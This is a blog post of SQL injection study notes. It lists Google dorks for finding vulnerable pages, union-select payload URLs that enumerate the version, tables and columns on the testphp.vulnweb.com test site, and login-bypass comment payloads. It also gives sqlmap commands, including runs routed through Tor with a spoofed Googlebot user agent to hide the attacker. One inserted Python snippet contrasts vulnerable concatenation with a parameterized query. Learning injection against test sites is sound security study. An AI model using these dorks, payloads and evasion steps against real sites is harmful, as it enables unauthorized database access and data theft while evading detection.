Simple notes on learning SQL injection

Posted by z奶油麵包 on 2018-02-28
Copyright notice: please credit the source when reposting: http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396286

Reference articles

Learning reference: http://bbs.pediy.com/thread-218235.htm

Google search:
inurl:"products.php?prodID="

inurl:buy.php?category=

http://testphp.vulnweb.com/listproducts.php?cat=1

http://testphp.vulnweb.com/listproducts.php?cat='

http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+1
http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+6

http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,@@version

Sometimes the server cannot interpret @@version directly and the value has to be converted. In that case replace @@version with convert(@@version using latin1) or unhex(hex(@@version)).

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,table_name+from+information_schema.tables

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(table_name)+from+information_schema.tables+where+table_schema=database()

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(column_name)+from+information_schema.columns+where+table_name=0x4556454e5453

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME)+from+information_schema.CHARACTER_SETS

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME,0x3a,DEFAULT_COLLATE_NAME,0x3a,DESCRIPTION,0x3a,MAXLEN)+from+information_schema.CHARACTER_SETS

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --time-sec 15

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns

Types of SQL injection
Classic SQLi
Blind or inference SQL injection
Database management system-specific SQLi
Compound SQLi
SQL injection + insufficient authentication
SQL injection + DDoS attacks
SQL injection + DNS hijacking
SQL injection + XSS

Incorrectly filtered escape characters

This form of SQL injection occurs when user input is not filtered for escape characters and is then passed straight into an SQL statement:
statement = "SELECT * FROM users WHERE name = '" + userName + "';"

Comments can even be used to block the rest of the query (there are three types of SQL comment). All three lines end with a trailing space:
' or '1'='1' --
' or '1'='1' ({
' or '1'='1' /*
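To show the concatenation flaw above next to its fix, here is an added example that is not code from the original post or from the pediy reference. It uses an in-memory SQLite database with constructed sample rows; `lookup_vulnerable` mirrors the concatenated statement from the post and `lookup_parameterized` is the assumed hardened form using a bound parameter.

```python
import sqlite3

# Constructed sample data; an in-memory SQLite database stands in for the
# application's real database.
SAMPLE_USERS = [("alice", "alice@example.com"), ("bob", "bob@example.com")]


def setup_db() -> sqlite3.Connection:
    """Create an in-memory users table holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_name: str) -> list:
    """The pattern from the post: user input concatenated into the statement.
    A quote in the input closes the string literal and a trailing comment
    discards the rest of the query, so the WHERE clause restricts nothing."""
    statement = "SELECT * FROM users WHERE name = '" + user_name + "';"
    return conn.execute(statement).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, user_name: str) -> list:
    """Hardened form: the statement text is fixed and the value travels as a
    bound parameter, so quotes and comment markers in it are plain characters."""
    return conn.execute("SELECT * FROM users WHERE name = ?", (user_name,)).fetchall()


def demo() -> tuple:
    """Run the same comment-style payload from the post through both lookups.
    Returns (rows from the vulnerable lookup, rows from the parameterized
    lookup, rows for a normal user name)."""
    conn = setup_db()
    payload = "' or '1'='1' -- "  # first of the three comment payloads above
    vulnerable_rows = lookup_vulnerable(conn, payload)
    safe_rows = lookup_parameterized(conn, payload)
    normal_rows = lookup_parameterized(conn, "alice")
    return len(vulnerable_rows), len(safe_rows), len(normal_rows)


if __name__ == "__main__":
    print(demo())  # (2, 0, 1)
```

The vulnerable lookup returns every row because the payload turns the condition into `name = '' or '1'='1'`, while the parameterized lookup returns nothing because no user is literally named `' or '1'='1' -- `.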

http://books.example.com/showReview.php?ID=5 AND substring(@@version,1,1)=4

apt-get install tor
tor
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=2 --tor --tor-type=SOCKS5

Disguising as Googlebot:
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=2 --tor --tor-type=SOCKS5 --user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
